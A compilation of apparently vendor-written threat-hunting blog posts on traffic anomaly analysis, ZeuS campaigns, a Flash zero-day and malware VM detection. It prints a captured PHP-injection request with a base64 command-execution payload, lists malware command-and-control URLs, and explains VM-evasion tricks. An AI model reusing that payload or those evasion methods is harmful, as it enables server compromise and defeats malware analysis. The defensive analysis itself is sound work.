Finding injection attacks by looking for injection attacks is a fail


I tend to be an opponent of looking for bad stuff by using “known bad dictionaries” like IP lists, signatures, etc. I tend to soapbox about how you can find far more known and unknown bad stuff by employing a methodology of separating out “presumed good” stuff, and examining outliers. Check out any of the other posts I have up here for more detail about this, probably starting with this post.

The InfoSec industry tends to focus very hard on the exploitation of clients (mostly end-users belonging to an organization, or customers of your organization – especially for financial institutions). Since the early 2000s, gradually less attention has been paid to the exploitation of servers.

As discussed in other posts here, the exact same forensics methodologies and logical reasoning apply not only to the high-level analysis of network traffic, but also to low-level areas like the characteristics of processes on a host. Likewise, the same techniques apply to finding bad things with hosts as well as with servers.

In this case, we were interested in finding anomalous inbound traffic going from clients to web servers. The logic we used went something like this:

1 – Most people browse webpages using a common web browser like Internet Explorer, Firefox, Safari, Chrome, etc.

2 – The user-agent strings of these browsers begin with Mozilla/4.0 or Mozilla/5.0.

So in this case, we were interested in sessions not matching the characteristics above. Those sessions are depicted here:

 

 

That’s a lot of results, most of them legitimate. We could have stopped there and applied the “if-then” logic we talk about in other articles to find the same types of activity we’ll see in a minute, but for the sake of discussion we went one step further.

In this case we were hunting for a more specific type of activity, so we added the following criteria to our logic:

3 – When hacking a website using an exploitation method where automation makes the process more efficient (for instance, SQL injection), it’s often easier to automate the attack with a high-level scripting language such as Perl.

We were able to combine the above logic into a single query as shown next:

 

 

The above query simply says “show us all network sessions where the user-agent contains the term perl.”

In many environments/traffic sets, this is all you need to find “interesting” things. In massive environments with custom-developed web applications, however, that query will likely still clutter your analysis with too many legitimate sessions. In those cases, it’s useful to layer in the following logic, which is a natural part of the “if-then” logic we talk about in other places.

1 – Because the server farm examined in this case resides in the United States and the customers of this application were primarily US-based, you can filter out all traffic originating from the United States (or whatever country applies to your case). Keep in mind, this would normally still include a massive amount of traffic, but we’ve already applied the filter to only include sessions where the user-agent contains the word perl. The combination of the two criteria typically reduces the number of sessions from millions to dozens.

2 – When using the logic above, it’s helpful to additionally filter out all sessions where the source country could not be resolved. This is a neat little trick for quickly removing traffic from RFC 1918 addresses, which typically means traffic sourced from inside the organization being examined – especially if you’re looking for bad things coming in. (We apply this logic all the time when looking for bad things going out as well – except in those cases we filter traffic where the destination country can’t be resolved. While this logic doesn’t apply to all cases, it’s a good place to start for most.)
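
For readers without the same tooling, the layered logic above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the session records, their field names (src_country, user_agent) and the sample values are hypothetical and are not a NetWitness schema or query syntax.

```python
# Hypothetical session records; field names and values are illustrative only.
SESSIONS = [
    {"src_ip": "203.0.113.7", "src_country": "romania", "user_agent": "libwww-perl/5.805"},
    {"src_ip": "198.51.100.20", "src_country": "united states", "user_agent": "libwww-perl/5.805"},
    {"src_ip": "10.1.2.3", "src_country": None, "user_agent": "libwww-perl/5.805"},
    {"src_ip": "203.0.113.9", "src_country": "romania", "user_agent": "Mozilla/5.0 (Windows NT 6.1)"},
]


def is_common_browser(user_agent):
    """Steps 1 and 2: mainstream browsers identify themselves as Mozilla/4.0 or Mozilla/5.0."""
    return user_agent.startswith(("Mozilla/4.0", "Mozilla/5.0"))


def interesting_sessions(sessions, home_country="united states", keyword="perl"):
    """Layer the filters: non-browser, keyword in user-agent, resolvable and foreign source."""
    hits = []
    for session in sessions:
        user_agent = session["user_agent"]
        if is_common_browser(user_agent):
            continue  # presumed good: ordinary browser traffic
        if keyword not in user_agent.lower():
            continue  # step 3: keep only user-agents mentioning the scripting language
        if session["src_country"] is None:
            continue  # unresolved country, typically RFC 1918 (internal) sources
        if session["src_country"] == home_country:
            continue  # expected customer base
        hits.append(session)
    return hits


for hit in interesting_sessions(SESSIONS):
    print(hit["src_ip"], hit["user_agent"])
```

None of the individual filters is interesting on its own; the reduction comes from stacking them, which is the point of the exercise.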

In this case, we ended up with the following eight sessions:

 

 

All eight of those sessions came from the same source. Digging into all sessions from this source turned up several others that were not part of the eight above, but which stood out like a sore thumb once we had found those eight (which is typically how it works). We found a lot of traffic like this:

 

POST /contactus.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: <redacted>
User-Agent: Mozilla/3.0 (OS/2; U)
Content-Type: application/x-www-form-urlencoded
Content-Length: 996
<redacted>&name=[php]eval(base64_decode('ZWNobyAiQU5BU0tJPGJyPiI7DQp
lY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQokY21kPSJlY2hvIEpGcnkiOw0KJGVzZWd1aWNt
ZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnO
w0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2
ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHM
oJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rp
b25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQ
G9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aX
N0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2J
fZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRm
ID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzI
C49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9'))%3B
die%28%29%3B%5B%2Fphp%5D

 

When we remove the encoded data for a moment and clean it up, we see the user is submitting the following in the form of a POST to contactus.php:

 

[php]eval(base64_decode('<encoded_data>'));die();[/php]

 

Even without being a PHP programmer, it’s fairly easy to see the attacker is using PHP injection to get the form handler contactus.php to execute something encoded inside the eval() statement. And what is inside that eval statement?

It’s decoded below:
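
The decoding step is easy to reproduce. Here is a minimal sketch in Python, assuming the POST body has been saved as a string; the function name extract_php_payload is made up for this example, and the sample uses only the first 24 characters of the encoded data shown above rather than the whole payload.

```python
import base64
import re
from urllib.parse import unquote


def extract_php_payload(post_body):
    """Return the decoded argument of base64_decode('...') in a POST body, or None."""
    # Undo the URL encoding first (%3B -> ';', %28 -> '(' and so on).
    body = unquote(post_body)
    match = re.search(r"base64_decode\('([^']*)'\)", body)
    if match is None:
        return None
    # The captured data may be wrapped across lines, so strip all whitespace.
    encoded = re.sub(r"\s+", "", match.group(1))
    # Restore any '=' padding lost when the string was cut or wrapped.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("latin-1")


# Only the first 24 characters of the encoded data from the session above.
sample = "name=[php]eval(base64_decode('ZWNobyAiQU5BU0tJPGJyPiI7'))%3Bdie%28%29%3B%5B%2Fphp%5D"
print(extract_php_payload(sample))  # prints: echo "ANASKI<br>";
```

Feeding the complete encoded string through the same function yields the rest of the script.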

 

 

After looking at the other sessions we see the connection with Anaski (pictured below) is not coincidental, as it usually is not with groups like them.

Again, this is just another fun example of how intelligent and tactical traffic carving methods turn up far more than you’d find going out and looking for specific things.

 

 

 

- Gary Golomb

 

 

Using WinDbg to Begin Reverse Engineering Unknown Malware from Memory


Part Two in a multi-part series on holistic, multi-disciplinary analysis and reversing.

 

The last post, “Mutex Analysis: The Canary in the Coal Mine,” started off showing how to use mutexes to discover malware that is difficult to locate using more traditional methods and tools. We used a live compromised system for the example and the post came to a relatively abrupt end when it seemed that we stumbled onto a new/unknown type of malware – or at least one that does not seem to have any public exposure or analysis. This post is “part 2” of our analysis.
 
Update 6/21/2011:
 
This post has been moved to the “Forensics and Reversing” section of the website. I apologize for the inconvenience. Read the full article here.

 

Mutex Analysis: The Canary in the Coal Mine (and Discovering New Families of Malware?)


Part One in a multi-part series on holistic, multi-disciplinary analysis and reversing.

This post is based on a presentation I gave at the last Thotcon, but was really prompted by a case from a couple days ago. It’s an interesting example of how the same disciplined methodologies for finding malicious traffic on the network also apply to sophisticated situations on the host. We’ll examine those methodologies and logic on the host by examining a little app I wrote called LockPick, pictured here and detailed later in this article. As we’ll see, mutex analysis is a VERY powerful way of analyzing systems during Incident Response. It can lead the direction of your analysis when other automated methods fail to do so.
 
Update 6/21/2011:
 
This post has been moved to the “Forensics and Reversing” section of the website. I apologize for the inconvenience. Read the full article here.

 

Dissecting the CVE-2011-0611 Flash Player Zero Day – Part 1


Within the past few days, we’ve seen the emergence of a new zero-day attack that involves Flash files embedded in Word documents. These have purportedly been used in an attempt to compromise machines belonging to government-affiliated persons, as detailed here:

http://krebsonsecurity.com/2011/04/new-adobe-flash-zero-day-being-exploited/

http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html

As detailed in previous posts, NetWitness tries to stay away from “signature” based detection of these types of attacks, and instead looks for indicators that point to something that is not the norm.

In this particular case, we took a sample of the zero-day attack, and ran it through a NextGen system that is configured with some of the malware detection parser technology that is part of our Spectrum Malware Analysis product.

Even with no prior knowledge of this attack, we are immediately alerted to the presence of an XOR encoded executable in the session:

Because the use of XOR to obfuscate executable content is common in the malware world, we’ve chosen to place this alert in our highest risk category.

Additionally, our forensic fingerprinting parsers identify the content in this session as containing executable content, as well as Flash content, which appears to be a Flash version 10 SWF file, despite the “.doc” filename.

So in this case, even if we weren’t aware of the *specific* attacks, a NextGen user would have been notified of the attack because of the collection of “abnormal” network activities.

Since we’ve determined that this is an incident that warrants further investigation, we can use the data-extract function to extract the Word document for further analysis:

 

Which allows us access to the fully reconstructed doc for further analysis:

 

Who needs signatures when you have NetWitness? More to follow involving malware analysis of the extracted samples.

- Alex Cox, Principal Research Analyst

 

ZeuS and SpyEye Merge! Business as usual for NetWitness Users!


There has been a lot of talk over the past few months about the rumored merger of ZeuS and SpyEye, two popular banking trojans that have been used by cybercriminals to commit fraud against consumers and businesses.

This is detailed in Brian Krebs’s blog here:

http://krebsonsecurity.com/2011/02/revisiting-the-spyeyezeus-merger/

While this ultimately appeals to many people’s interest in the “sex, drugs and rock and roll” aspect of the underground economy and its parallels with traditional organized crime, it is, in reality, business as usual.

Much like a modern business, the criminal underground works under a development life-cycle model.   Mergers occur.   New innovations and technology emerge.  Collaboration happens.

What that means in the grand scheme of cyber-security is this:   You’ve got to be agile, and more importantly, understand your network and connected systems.  The bad guys will be one step ahead of you until you can do this.

Here’s an example. NetWitness tracks botnets and malware families as part of our routine day-to-day business. This practice is good for essentially two things: covering the items that are popular media fodder, for the inevitable “What are we doing about this?” question from your CISO, and understanding the common methodology used by cybercriminals in the pursuit of their business. Ultimately, it is largely a game of “whack-a-mole”.

The really “fun stuff” is discovered when you start comparing your traffic against what is known good, and looking for outliers.    Here’s an example put together by a couple of our senior analysts, Gary Golomb (Malware Research) and Mike Sconzo (Professional Services), whose day-to-day jobs involve ferreting intrusions out in very large networks.

In this case, Mike wrote a flex parser which analyzes header elements in an HTTP session, and identifies things that are abnormal or that don’t match the RFC for properly formed HTTP header entries.   When it sees this, it creates an alert entry in the NextGen framework that identifies the issue.

Gary then combined this parser logic with the idea of using a watchlist on countries and file extensions.   He focused on countries that we commonly see involved with trojan and cybercrime activity:

afghanistan
belarus
bosnia and herzegovina
bulgaria
cayman islands
china
croatia
czech republic
egypt
georgia
india
kazakhstan
kyrgyzstan
latvia
libyan arab jamahiriya
lithuania
netherlands
nigeria
oman
pakistan
palestinian territory
qatar
romania
russian federation
satellite provider
saudi arabia
serbia
singapore
slovakia
slovenia
syrian arab republic
trinidad and tobago
turkey
turks and caicos islands
ukraine
united arab emirates
uzbekistan
yemen

and the following file extensions, all common, but seen with an above average frequency in cybercrime investigations.

exe
cgi
php
bin
rar
zip
pdf
txt
jar
js

In plain-language, this essentially asks the NextGen framework to:

“Show me only those sessions that have unusual http header combinations, from watchlist countries with these ten file extensions”

What Gary found was that of the millions of sessions that he started with, this three-part “pivot” reduced those sessions to about 180. Of those 180, 175 were intrusions.
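
The same three-part pivot can be sketched outside of NextGen. The Python below is a hedged illustration only: the header_anomaly flag stands in for the output of Mike’s flex parser (whose logic is not shown here), the field names are hypothetical, the URLs are placeholders, and the country set is a short subset of the watchlist above.

```python
import posixpath
from urllib.parse import urlparse

# Subset of the country watchlist above, kept short for the example.
WATCHLIST_COUNTRIES = {"belarus", "china", "latvia", "romania", "russian federation", "ukraine"}
# The ten file extensions listed above.
WATCHLIST_EXTENSIONS = {"exe", "cgi", "php", "bin", "rar", "zip", "pdf", "txt", "jar", "js"}


def file_extension(url):
    """Return the lower-case extension of the URL path, without the dot."""
    path = urlparse(url).path
    return posixpath.splitext(path)[1].lstrip(".").lower()


def pivot(sessions):
    """Keep sessions that satisfy all three criteria at once."""
    return [
        s for s in sessions
        if s["header_anomaly"]                      # hypothetical flag set by a header parser
        and s["country"] in WATCHLIST_COUNTRIES
        and file_extension(s["url"]) in WATCHLIST_EXTENSIONS
    ]


# Hypothetical sessions with placeholder hostnames.
sample_sessions = [
    {"country": "belarus", "url": "http://example.test/stat/gate.php?id=1", "header_anomaly": True},
    {"country": "belarus", "url": "http://example.test/index.html", "header_anomaly": True},
    {"country": "canada", "url": "http://example.test/update.exe", "header_anomaly": True},
    {"country": "latvia", "url": "http://example.test/cfg.bin", "header_anomaly": False},
]

for session in pivot(sample_sessions):
    print(session["country"], session["url"])
```

Each test alone matches plenty of legitimate traffic; only the intersection is small enough to review by hand.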

These 175 consisted of common Trojan activity like ZeuS and SpyEye, but also never-before-seen cases and custom malware.

So when it comes to detecting malware families, who cares?   Can you detect what’s unusual for YOUR network?   That’s where the good stuff is hiding.

Happy Hunting!

Alex Cox, Principal Research Analyst

Life at NetWitness…


Sometimes even I have to admit that working at NetWitness is quite a unique experience. Because of what we do, the company has a very open culture. Our Internet connections always have various deployments of our products on them, and our engineering staff is encouraged to use them for monitoring. Today I posted a couple of pictures to a friend on Facebook. Within minutes, I received the following from a colleague: “Hey – check out the new Facebook parser!” – along with the attached:

Network Forensics and Reverse Engineering Part 2 – A deeper dive into real JavaScript analysis and reverse engineering


Introduction

In our first post in the forensics and reversing series, we examined why HTTP gzip content encoding is a larger and more serious problem than most people realize. We’ll use the end of the first post as a starting point for analysis in this post. It also serves as an example of something far more important. That is, the very heart of forensics – and something I’d propose is the very definition of forensics. I teach a network forensics and reversing class together with Mike Sconzo about once a month. This is a point I raise at least a dozen times a day in class. That is:

World class forensics engineers are the ones who quickly and intelligently reduce millions of sessions to about a dozen worthy of deeper analysis.

What constitutes quickly? I suppose it depends on the tool being used to perform the analysis, but I’d generalize by saying no more than a couple minutes and/or the same number of clicks. We’ll see this in a moment.

What constitutes intelligently? We can answer this question by looking at a host-based forensics analogy. Suppose you were given a hard disk of a compromised machine and you needed to find the malware. There could be millions of files on the computer, so where do you start? Most of the time, especially for most standard compromises, the following steps will work (this is an over-generalization, but one that works nonetheless):

  1. Show only PE files (exe, dll, etc.). At this point you’ve probably gone from nearly a million to about 100,000.
  2. Show only PE files outside the Program Files directory. Here you may go from about a hundred thousand files to tens of thousands.
  3. Depending on the assumed time of compromise, show only those PE files modified or created in a specific range of days. At this point you should go from tens of thousands to fewer than 100.
  4. Since malware tends to be smaller in size, show only those PE files less than 500k. At this point you should be looking at only a handful of files, and most of the time, the malware you’re looking for will be one of them.

In the above steps, you found malware NOT by looking for known traits of malware. You did it by examining general characteristics about file traits. In other words, by examining characteristics external to the file, not by searching for signatures or other characteristics internal to the file. Typically, each of those traits by itself is completely uninteresting until it is combined with other “uninteresting” traits, making them very interesting when layered together.
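
The four steps above can be sketched as a small Python script. Treat it as a rough illustration rather than a forensic tool: it assumes a mounted copy of the disk, uses the two-byte “MZ” magic as a cheap stand-in for real PE parsing, and the function names and defaults are invented for this example. The cheap metadata checks run before the file is opened, so the order differs slightly from the list.

```python
import os
import time


def is_pe_file(path):
    """Cheap PE test: the file starts with the 'MZ' magic (a simplification)."""
    try:
        with open(path, "rb") as handle:
            return handle.read(2) == b"MZ"
    except OSError:
        return False


def triage(root, start_ts, end_ts, max_size=500 * 1024):
    """Layer the traits: not under Program Files, small, recently modified, PE."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Step 2: do not descend into 'Program Files' or 'Program Files (x86)'.
        dirnames[:] = [d for d in dirnames if not d.lower().startswith("program files")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                info = os.stat(path)
            except OSError:
                continue
            if info.st_size >= max_size:
                continue  # step 4: malware tends to be small
            if not (start_ts <= info.st_mtime <= end_ts):
                continue  # step 3: outside the assumed compromise window
            if not is_pe_file(path):
                continue  # step 1: PE files only
            hits.append(path)
    return hits


if __name__ == "__main__":
    now = time.time()
    # Example: small PE files modified in the last 7 days under the current directory.
    for found in triage(".", now - 7 * 86400, now):
        print(found)
```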

As you’ll see next, the same applies to network traffic. We can intelligently go from millions of sessions to only a few by wisely layering traits of network sessions with little attention paid to what is inside those sessions.

Read the full and detailed post here:
http://www.networkforensics.com/forensics-and-reverse-engineering-series/

Gary Golomb

Welcome Back, Rustock.


It seems that our holiday from Rustock-generated spam is over.

http://bits.blogs.nytimes.com/2011/01/06/spamming-declines-at-least-temporarily/?partner=rss&emc=rss

We monitor a number of botnets at NetWitness and check them occasionally for new information. Since Rustock is in the news, we’ve paid close attention to it recently. Sometime this morning, Rustock began spamming again, pushing Viagra from shady .ru sites.

Looking at the traffic in Investigator,  I see a quick overview of subject lines:

And reconstructed, we see a very in-depth message of “CLICK HERE!”

Which of course takes us to Canadian Pharmacy!

Welcome back Rustock… We can’t say we’ve missed you. There is no telling if this activity will continue, but it appears to be business as usual for the Rustock operators.

Cyber-Crime or Cyber-Espionage?


Brian Krebs posted an article on his blog this morning that documents a recent spam attack on U.S. government employees that occurred around Christmas time.

http://krebsonsecurity.com/2011/01/white-house-ecard-dupes-dot-gov-geeks/

which has in-depth technical coverage at:

http://contagiodump.blogspot.com/2011/01/general-file-information-file-card.html

Using a very simple ruse of “Merry Christmas from the White House”, this message used the common “ecard” social engineering hook to push a ZeuS trojan variant to the unlucky recipient.

From a configuration standpoint, this ZeuS bot used the following command and control points, all of which are down as of this writing:

Configuration Files:

http://patmarclean.us/flash/resny.bin

http://rogersvillechamber.us/components/tmpny.bin

http://ingunnanvik.no/templates/system/sysny.bin

http://argentum.lv/modules/rssny.bin

Binary Updates:

http://ingunnanvik.no/templates/system/botny.exe

Information Drops:

http://209.172.60.242/~newdowni/stat/gate_in.php

http://someonesome.mobi/imgs_ctn/icon_sml/gate_in.php

http://shock-world.mobi/zs/tmp/gate.php

It was poised to collect credentials from most major banks, but also included sites such as eBay, MySpace, and Microsoft, as well as the online payment processors PayPal and e-gold.

While these facts alone show similarities to infrastructure aspects of the “kneber” compromise that we documented back in February 2010, a very specific tie-in makes us believe that this attack was driven by operators that were also a part of the initial “kneber” compromise.

One domain in the original kneber data, “updatekernel.com” was tied specifically to a phishing email that used a spoofed address to push ZeuS to targeted government-employees, which Brian details here:

http://krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/

An interesting sidenote to this particular aspect of the kneber data was that the ZeuS bot that was involved with this phish had a second stage download of an executable called “stat.exe”. This malware was revealed to be a Perl script converted to a stand-alone executable with the perl2exe tool.

This malware searched the local hard drive of the victim PC for xls, doc and pdf files, and uploaded them via FTP to:

packupdate.com

Which at the time, resided on a server in Belarus.

This current spam run also downloaded a second-stage executable, called “pack.exe”, which also:

- Was a perl2exe executable
- Searched the victim PC for all xls, doc and pdf files
- Uploaded stolen information to a server in Belarus, which resolved to “uploadpack.org”

So in this case, we have two executables and three domain names that share three converging elements (pack, Belarus and perl2exe).

When compared, these two files, separated by almost a year, are nearly identical in size:

Furthermore when analyzed with HBGary’s “fingerprint” tool, which looks for code similarities and “toolmarks”, a 95.8% match is indicated, with the only differing factors being the CPUID of the machine on which the malware was compiled:

This, because it is such a small and fairly unknown aspect of the kneber compromise, makes us think that this is indeed the same operator, who is again after documents pertaining to U.S. Government activities.

This evidence shows the continuing convergence of cyber-crime and cyber-espionage activities, and how they occasionally mirror or play off one another.

The question again, which we posed in our initial Kneber document, is:

Who is the end consumer of this information?

Alex Cox, Principal Research Analyst

VM Detection by In-The-Wild Malware


 

Motivation

 

A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There are numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc.

Malware that attempts to detect if it’s running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.

VM detection does not apply just to the realm of APT-level malware. Agobot/Gaobot/PhatBot is a family of massively deployed malware, first released in 2004, that can detect whether it is running in either VMware or VirtualPC and change its behavior accordingly. Considering just this example of how old and low-entry malware (with such a massive deployment) performs these actions, our attention to this subject should be especially keen.

Notes

 

1 – This post contains a number of techniques for VM detection used by malware, along with code demonstrating how simple these techniques are to implement. Except where noted, all techniques are currently used in the wild.

2 – Most of this post (but not all) is a summary of other people’s work, not mine – except where noted. References are given and should be accurate. If not, email me and I’ll correct.

3 – Examples where simple code samples could not be produced will not be considered here.

Only techniques that are difficult to mitigate are examined here. I’m sure there are hundreds of other ways to detect VM’s. Of the methods I’m familiar with, these were the ones that stood out in my mind as being difficult to fight.

Types of Virtual Machines

 

Generally speaking, there are three types of Virtual Machines. They are:

1 – Hardware Assisted – aka: Hypervisors – These VM’s use processor-specific instructions to cause the Host OS to [in effect] “fork,” where the original copy of the OS stays in a suspended state while the newly spawned “Guest copy” continues to run as if nothing happened. The important thing to keep in mind relative to this topic is that when the Guest executes machine level instructions, the actual hardware CPU is used to execute those instructions.

2 – Reduced Privilege – These are the VM’s most people are familiar with and use regularly. Here, the Host takes more of an active “proxy” role for the Guest by virtualizing important data structures and registers, then performing some level of translation services for some machine level instructions. Relative to this topic, the important thing to note here is that the guest – in effect – runs at a lower privilege than if it was truly controlling the CPU.

3 – Pure Software – Software VM’s act as full proxies to the CPU by implementing a truly virtual CPU the Guest interacts with.

Hypervisors (Hardware Assisted VMs)

 

Xen > 3.x and Virtual Server 2005 are a couple examples of Hardware assisted virtual machines.

Low-level detection of being virtualized in one of these environments is extremely difficult. Many people still call it impossible. While several people have talked publicly for years about proof of concept code developed to detect these environments, none has been released or found in the wild (that I’m aware of). Because of this, I will not talk about hypervisors any further than describing why detection is so difficult. (Since we have no code to examine how simple it is – the point of this post.)

A Hypervisor “guest” can be launched at any point after the OS has loaded. In preparation for launching a guest copy of the OS, the “host” sets up some basic CPU-specific control structures, then uses a single instruction (opcode) to cause the CPU to place the Host OS in a virtualized state while the Guest is basically a “forked copy” of the originally running OS. Once a Hypervisor has started running, the Guest OS basically has zero knowledge of this fact since all access to hardware is direct access. While the access to hardware is direct, the Hypervisor VM itself still has the ability to intercept interesting events – even before the Host OS has seen them. In effect, a hypervisor VM is more powerful than both the Host and Guest OSs because it sees everything before either of them. Also, once a hypervisor is running, no others can become active. The first hypervisor VM has absolute control.

All methods for detecting the presence of Hypervisors depend on timing functions, however they are only useful techniques in theory because of the infeasibility of creating a good baseline to compare timing results to in order to make a pass/fail decision. Another technique uses context switching to cause Translation Lookaside Buffers filled with a predetermined pattern of data to get flushed when a hypervisor is running. Describing the technique is far beyond the scope of this paper since there is no exploit code to examine, but… Based on my understanding of the following article, I’m not sure the technique is so relevant anymore anyways. http://download.intel.com/technology/itj/2006/v10i3/v10-i3-art01.pdf

VMware

 

The non-ESX versions of VMware are reduced privilege VMs, and because of that are trivial to detect. Because critical data structures set up by the Operating System in critical regions of memory during OS start-up are already in use by the Host OS, VMware must relocate virtual copies of them for use by the Guest OS. This fact alone presents several powerful opportunities to detect when running inside a VMware image.

The first example simply checks the base address of the Interrupt Descriptor Table, as shown below. If the IDT is at a location much higher than its normal location, the process is likely inside a VM. This technique is generally attributed to Joanna Rutkowska, and is described here.

Code:

In the above example, line #6 is the single line of assembly it takes to get the base address of the IDT, which is then tested a couple lines below that. SIDT is an instruction that stores the contents of the interrupt descriptor table register (IDTR) in the destination operand. It’s important to note this instruction is an unprivileged instruction that can be executed at any privilege level. However, according to the paper, “Detecting the Presence of Virtual Machines Using the Local Data Table,” verifying the IDT on multi-processor systems will fail when there is an IDT for each microprocessor.

If that detection technique wasn’t simple enough, the next one is. VMware builds the Local Descriptor Table in memory, however Windows does not. Therefore, simply checking for a non-zero address for the LDT when running in Windows is enough to identify VMware.

On line #6, SLDT is the assembly instruction to store the segment selector from the local descriptor table register (LDTR) in the destination operand. It’s important to note this instruction is also an unprivileged instruction that can be executed at any privilege level!
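
The original assembly listings are not reproduced here, and SIDT and SLDT cannot be issued directly from a high-level scripting language. What can be sketched is the decision logic applied to their results. The Python below is an illustration under assumptions: it takes the 6 bytes that SIDT stores in 32-bit mode (a 2-byte limit followed by a 4-byte base) and the 16-bit value stored by SLDT as inputs, and the 0xD0 threshold on the high byte of the IDT base is borrowed from the publicly circulated “Red Pill” proof of concept, not from the missing listing. The sample values in the usage lines are illustrative only.

```python
import struct

# Assumption: high-byte threshold taken from the public "Red Pill" proof of concept.
IDT_HIGH_BYTE_THRESHOLD = 0xD0


def idt_base_from_sidt(raw):
    """Parse the 6 bytes stored by SIDT in 32-bit mode: 2-byte limit, 4-byte base."""
    if len(raw) != 6:
        raise ValueError("expected exactly 6 bytes from SIDT")
    _limit, base = struct.unpack("<HI", raw)
    return base


def idt_looks_virtualized(raw):
    """True when the IDT base sits far higher in memory than a native OS places it."""
    return (idt_base_from_sidt(raw) >> 24) > IDT_HIGH_BYTE_THRESHOLD


def ldt_looks_virtualized(ldt_selector):
    """True when SLDT returned a non-zero value, which the text ties to VMware on Windows."""
    return ldt_selector != 0


# Illustrative values only: a low IDT base versus a relocated, much higher one.
native = struct.pack("<HI", 0x07FF, 0x8003F400)
relocated = struct.pack("<HI", 0x07FF, 0xFFC18000)
print(idt_looks_virtualized(native), idt_looks_virtualized(relocated))
print(ldt_looks_virtualized(0x0000), ldt_looks_virtualized(0x4058))
```

The multi-processor caveat above still applies: with one IDT per processor, a single reading may not be representative.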

Another interesting feature of VMware is seen when executing the IN instruction from user-land of common OSs like Linux, Windows, etc. (and more accurately, when executing this instruction in ring3). IN is the “Input from Port” instruction. It copies the value from the I/O port specified with the source operand to the destination operand. The IN instruction is a privileged instruction which cannot be run from ring3 (user-land), therefore when executed, an exception should be thrown. However, when VMware is running, no exception is generated if a special input port is specified. That port is “0x5658,” aka: “VX.” This technique is described in much more detail in the original posting here.

Example code is below, with comments added to explain each step.

Some people writing for SANS have said that disabling certain configuration options in VMware will defeat this type of detection mechanism. Unfortunately, the real IN instruction would never change any register other than EAX in the first place, so all the other register changes that take place when executing the instruction in VMware are still detectable. Other counter-measures have been proposed, however they are too unstable and unusable in the real world for us to consider here.

VirtualPC

VirtualPC is also a reduced privilege VM, like non-ESX versions of VMware, and is just as trivial to detect. The IDT and LDT table structure tests described in the VMware section apply to VirtualPC as-is. In fact, those tests apply to all the big-name VMs that people are most familiar with in the Reduced Privilege category of VMs.

VirtualPC has functionality similar to VMware’s use of the IN instruction, however it uses illegal instructions to trigger exceptions the kernel will catch. For example, issuing the following machine code would normally cause an exception because it’s an undefined opcode: 0F 3F 0A 00. But, with VirtualPC running, no exception is generated because this is part of VirtualPC’s guest to host communication protocol. Therefore, the code in the VMware example can simply be modified to issue this opcode, then test for a lack of exception.

A more interesting feature of VirtualPC is its use of “buffered code emulation.” Buffered code emulation is the practice of copying an instruction from a Guest into a host-controlled buffer and executing it there, then returning the results to the Guest. As VirtualPC is intercepting every instruction and deciding what to return back to the caller, it will sometimes alter or craft its own results – as it does with the CPUID instruction. Normal values returned are “GenuineIntel” and “AuthenticAMD.” With VirtualPC, the result is “ConnectixCPU.”

But, I like this example of VirtualPC detection best since it uses the high-level and easy to use language, C#. Consider the following:

The above example pulls the manufacturer name of the motherboard and tests if it’s “Microsoft Corporation.” If it is, then VirtualPC has just been detected.

Software VMs

 

Examples of software VMs include Bochs, Hydra, QEMU, Atlantis, and Norman Sandbox, among many others. Because software VMs try to fully emulate hardware, there are too many techniques to detect them to list here. Because it would be nearly impossible to implement every instruction and match the quirks each instruction has on different families of processors, most of the tests for Software VMs revolve around testing some of the more arcane instructions.

Sandboxes

 

I personally love sandboxes because of the sheer volume of work they automate and standardization of data they return. I can’t even imagine life before they existed anymore! :-) However, we need to be realistic about the fact that most (but not all!) are trivial to detect, regardless of hardware platform. This doesn’t mean we should avoid them – it just means we need to ensure we’re compensating for that fact.

A technique I have not seen elsewhere and have used in my own “research” malware in the past is to check the DLLs that have been loaded into my program’s space. To use this technique, you must first create a “fingerprint” of the DLLs your program loads. This is easily accomplished with a couple lines of debug code after you have finished your program. The technique is easy and can be used even in high-level languages like C#. Consider the following:

bool checkName(string nameOfLoadedDLL) is a method that returns true if the dll mapped in the program’s process space is known to belong to the “fingerprint” of this program. If the dll mapped in is unknown to the program, then it returns false and the logic below is executed.
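
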